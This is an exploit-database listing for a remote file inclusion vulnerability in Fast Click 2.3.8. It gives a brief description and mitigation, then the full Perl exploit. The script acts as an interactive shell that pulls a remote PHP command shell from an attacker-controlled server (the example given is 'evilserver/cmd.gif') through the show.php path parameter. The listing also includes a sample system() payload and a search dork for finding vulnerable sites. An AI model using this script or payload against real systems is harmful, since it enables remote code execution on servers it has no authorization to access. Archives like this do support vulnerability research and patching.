Fast Click - exploit.company

vendor:

Fast Click

by:

R@1D3N (amin emami)

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Fast Click

Affected Version From: 2.3.8

Affected Version To: 2.3.8

Patch Exists: Unknown

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

Unknown

Fast Click <= 2.3.8 Remote File Inclusion exploit

Fast Click <= 2.3.8 is vulnerable to a Remote File Inclusion vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute arbitrary code on the vulnerable system. This exploit was discovered and coded by R@1D3N (amin emami). The exploit requires the attacker to know the full path to the Fastclick application, the path to the command shell, and the command variable used in the PHP shell.

Mitigation:

To mitigate this vulnerability, the application should be configured to only allow the inclusion of files from a limited set of directories. Additionally, the application should be configured to only allow the inclusion of files with specific extensions.

Source

Exploit-DB raw data:

#!/usr/bin/perl
##
# Fast Click <= 2.3.8 Remote File Inclusion exploit
# Bug discovered and cod3d by R@1D3N (amin emami)
#Greet:Outlaw - Aura - Dltrp - Cl0wn - B3HZAD - sm0k3r - Exploitercode - Str0ke and all persian Cyber team
#http://www.aria-security.net
#Dork:inurl:"fclick.php?fid"
# usage:
# perl fc.pl <target> <cmd shell location> <cmd shell variable>
# perl fc.pl http://target.com/fclick/ http://target.com/cmd.gif cmd
# cmd shell example: <?system($cmd);?>
# cmd shell variable: ($_GET[cmd]);

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

while()
{
      print "[shell] \$";
while(<STDIN>)
      {
              $cmd=$_;
              chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'show.php?path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[ê]/;

if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
      {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

if($return =~ /(.*)/)

{
      $finreturn = $1;
      $finreturn=~ tr/[ê]/[\n]/;
      print "\r\n$finreturn\n\r";
      last;
}

else {print "[shell] \$";}}}last;

sub head()
 {
 print "\n============================================================================\r\n";
 print " Fast Click <= 2.3.8 Remote File Inclusion exploit\r\n";
 print "============================================================================\r\n";
 }
sub usage()
 {
 head();
 print " Usage: perl fc.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
 print " <Site> - Full path to Fastclick ex: http://www.site.com/fclick/ \r\n";
 print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n";
 print " <cmd variable> - Command variable used in php shell \r\n";
 print "============================================================================\r\n";
 print "                           bug discovered by RAYD3N \r\n";
 print " www.Aria-security.net/Forums/ \r\n";
 print "============================================================================\r\n";
 exit();
 }

# milw0rm.com [2006-05-02]